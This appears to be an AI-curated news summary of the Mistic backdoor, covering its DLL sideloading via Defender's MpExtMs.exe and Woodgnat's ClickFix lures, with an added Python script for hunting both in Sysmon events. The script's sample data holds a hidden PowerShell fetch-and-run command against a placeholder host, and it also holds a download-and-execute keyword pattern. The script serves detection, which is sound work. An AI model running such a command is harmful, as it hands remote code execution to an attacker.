The Bottom Line: The Mistic backdoor exploits DLL sideloading via a signed Microsoft Defender file for memory-resident code execution and combines in-memory persistence with credential-stealing capabilities.
Symantec researchers have identified a new backdoor called Mistic, deployed by the threat actor group Woodgnat (KongTuke) since April. Mistic serves as an entry mechanism for ransomware gangs, to whom Woodgnat sells network access.
Mistic has been detected in enterprise intrusions since April across multiple industries: insurance, education, IT, and professional services. In some cases the backdoor operates alongside ModeloRAT, a Python-based malware attributed to Woodgnat; Symantec has observed ModeloRAT delivering the Qilin ransomware.
The loading method is DLL sideloading. The attackers drop MpExtMs.exe, a legitimately signed Microsoft Defender executable, together with an attacker-controlled version.dll. Because MpExtMs.exe resolves version.dll by name, the Windows DLL search order picks up the copy sitting next to the executable before the genuine one in System32, so signature- and allow-list-based controls see only a trusted Microsoft binary starting. That version.dll in turn loads EndpointDlp.dll, which is the Mistic backdoor itself. Once loaded, the backdoor code runs only in memory rather than being written to disk as a separate payload. Its other features include file management (write, delete, move), file transfer to and from the C2 server, and a kill switch that lets the operators remove the implant on command.
Woodgnat has operated since May 2024 and over two years has supplied multiple ransomware gangs with access: Interlock, Rhysida, Akira, 8Base, and Black Basta. Initial compromise is predominantly through ClickFix campaigns, which trick users into running PowerShell commands they have copied from fake CAPTCHA checks or fake error dialogs. Since April, Woodgnat has also impersonated IT support over Microsoft Teams to walk victims through the same copy-and-paste steps.
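The two techniques described above, the MpExtMs.exe sideloading chain and the ClickFix paste-and-run launch, both leave characteristic traces in endpoint telemetry. The following detection logic is an added example written for this page, not code from Symantec, CSO Online or the threat actor. It takes the file names MpExtMs.exe, version.dll and EndpointDlp.dll from the article; everything else is an assumption: the event dictionaries are modelled on Sysmon Event ID 7 (ImageLoad) and Event ID 1 (ProcessCreate) fields, the "known-good" directories for version.dll and for Defender's own binaries are the Windows defaults as I know them, and the sample events are constructed.

```python
"""Hunt for the Mistic sideloading chain and ClickFix-style launches in Sysmon-like events.

Added example for this page (not the vendor's or the actor's code). Event field names
follow Sysmon ID 7 (Image, ImageLoaded, Signed) and ID 1 (Image, ParentImage, CommandLine).
"""
import ntpath
import re

# Assumption: the only directories where a genuine version.dll lives on Windows.
SYSTEM_DLL_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Assumption: where Microsoft Defender's own MpExtMs.exe would normally run from.
DEFENDER_DIRS = (
    r"c:\program files\windows defender",
    r"c:\programdata\microsoft\windows defender\platform",
)
# Interpreters a pasted ClickFix command typically starts, and keywords that fetch/execute code.
PASTE_INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
DOWNLOAD_EXEC = re.compile(
    r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
    r"downloadstring|frombase64string)\b",
    re.IGNORECASE,
)


def _check_image_load(ev):
    """Sysmon ID 7: the signed Defender binary loading a DLL it should not be loading."""
    image = ev["Image"].lower()
    loaded = ev["ImageLoaded"].lower()
    if ntpath.basename(image) != "mpextms.exe":
        return None
    dll = ntpath.basename(loaded)
    if dll == "version.dll" and ntpath.dirname(loaded) not in SYSTEM_DLL_DIRS:
        # Classic sideload: version.dll resolved from the exe's own directory, not System32.
        return "sideload: MpExtMs.exe loaded version.dll outside System32 (%s)" % loaded
    if dll == "endpointdlp.dll" and str(ev.get("Signed", "")).lower() != "true":
        return "sideload: MpExtMs.exe loaded unsigned EndpointDlp.dll (%s)" % loaded
    if not ntpath.dirname(image).startswith(DEFENDER_DIRS):
        # A genuine Defender binary running from a user-writable path is itself suspicious.
        return "relocated binary: MpExtMs.exe running from %s" % ntpath.dirname(image)
    return None


def _check_process_create(ev):
    """Sysmon ID 1: an interpreter spawned by explorer.exe (the Win+R Run dialog) with a
    command line that downloads and executes code, which is what a ClickFix paste produces."""
    image = ntpath.basename(ev["Image"].lower())
    parent = ntpath.basename(ev.get("ParentImage", "").lower())
    cmdline = ev.get("CommandLine", "")
    if image not in PASTE_INTERPRETERS:
        return None
    if parent == "explorer.exe" and DOWNLOAD_EXEC.search(cmdline):
        return "clickfix: %s spawned by explorer.exe with download/exec command line" % image
    return None


def classify(ev):
    """Return a finding string for one event, or None if it looks benign."""
    if ev.get("EventID") == 7:
        return _check_image_load(ev)
    if ev.get("EventID") == 1:
        return _check_process_create(ev)
    return None


def hunt(events):
    """Run classify() over a batch of events and return (EventID, finding) pairs."""
    findings = []
    for ev in events:
        finding = classify(ev)
        if finding:
            findings.append((ev["EventID"], finding))
    return findings


# Constructed sample telemetry (not real captures): two sideload loads, one legitimate
# Defender load, one ClickFix-style launch, and one benign PowerShell launch.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Local\Temp\MpExtMs.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\version.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Local\Temp\MpExtMs.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\EndpointDlp.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.0\MpExtMs.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm http://example.invalid/c)"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "powershell Get-Date"},
]

if __name__ == "__main__":
    for event_id, finding in hunt(SAMPLE_EVENTS):
        print(event_id, finding)
```

Two practical caveats: Sysmon only emits Event ID 7 for DLLs your configuration includes, so an ImageLoad rule for version.dll (and for any DLL loaded by MpExtMs.exe) has to be present before this hunt sees anything; and the ClickFix check only catches commands pasted into the Run dialog, so the text the user pasted is also worth pulling from the HKCU RunMRU registry key during triage, while a command pasted into a terminal instead will show a console host rather than explorer.exe as the parent.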
After initial infection, Woodgnat profiles machines to assess their value for sale. The use of memory-resident execution and a custom-developed backdoor marks a trend: initial-access brokers are returning to custom malware rather than relying solely on “living-off-the-land” tactics.
Source: www.csoonline.com · Published June 25, 2026
Lumi AI News — AI-assisted curation pursuant to Art. 50 EU AI Act. Paraphrase and classification by Lumi News Pipeline v1.7.1.